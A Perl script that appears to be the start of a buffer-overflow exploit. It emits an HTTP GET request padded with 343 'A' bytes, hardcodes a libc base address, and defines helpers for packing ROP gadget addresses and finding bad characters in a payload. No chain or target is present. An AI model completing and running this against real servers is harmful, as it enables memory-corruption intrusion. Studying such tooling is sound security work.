#!/usr/bin/perl
# Request-skeleton generator: builds one HTTP/1.0 GET request whose path is a
# run of filler bytes and writes it to STDOUT. Nothing in this part of the
# script opens a socket, and none of the helper subs defined further down is
# called here -- the path contains filler only.

$| = 1;    # autoflush STDOUT so the request is written immediately

# Absolute address that libc() adds its offsets to.
# NOTE(review): this is a fixed value for one particular process image; where
# address-space layout randomisation is active the libc load address changes
# between runs, so the constant is not portable.
$libc_base = 0xb6e9c000;

# 343 bytes of "A" used as the request path.
$buf = "A" x 343;

# Percent-encode every byte that is not an ASCII letter, digit or "/".
# (For the all-"A" filler above this leaves the string unchanged.)
($uri = $buf) =~ s/([^A-Za-z0-9\/])/sprintf("%%%02X", ord($1))/seg;

# Bare LF line endings, exactly as the request is emitted.
$request = "GET /${uri} HTTP/1.0\n\n";

print $request;
##### HELPER FUNCTIONS FOR ROP CHAINING #####

# Turn an offset inside libc into a packed absolute address.
#
# Argument:
#   $offset - offset relative to the start of libc
#
# Reads the package global $libc_base and dies when it is zero (an undefined
# value also compares equal to zero). Returns a 4-byte string: the sum
# $libc_base + $offset encoded by pack "V", i.e. as an unsigned 32-bit
# little-endian value.
sub libc {
    my $gadget_offset = shift;

    # Refuse to build an address from an unset base.
    die('$libc_base not defined') if $libc_base == 0;

    my $absolute = $libc_base + $gadget_offset;
    return pack("V", $absolute);
}
# Encode a plain value as one stack slot.
#
# Argument:
#   $data - the number to encode
#
# Returns a 4-byte string: pack "V" writes the value as an unsigned 32-bit
# little-endian integer.
sub data {
    my $value = shift;
    my $dword = pack("V", $value);
    return $dword;
}
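# Report every occurrence of a forbidden character in a string.
#
# Arguments:
#   $string   - the string to scan
#   $badchars - a string whose individual characters are the forbidden ones
#
# Each hit is written to STDERR as "[!] 0x%02x appears at position %d", where
# the position is the zero-based offset within $string. Returns the total
# number of hits, so a caller can refuse to continue when it is non-zero.
#
# e.g. detect_badchars($payload, "\x00\x0a\x0d/?");
sub detect_badchars {
    my ($string, $badchars) = @_;
    my $hits = 0;

    # The loop variable is lexical, so the sub does not touch the package
    # global $badchar and also compiles under "use strict".
    for my $badchar (split(//, $badchars)) {
        my $pos = index($string, $badchar);
        while ($pos != -1) {
            printf STDERR "[!] 0x%02x appears at position %d\n", ord($badchar), $pos;
            $hits++;

            # Resume the search one character past the hit just reported.
            $pos = index($string, $badchar, $pos + 1);
        }
    }

    return $hits;
}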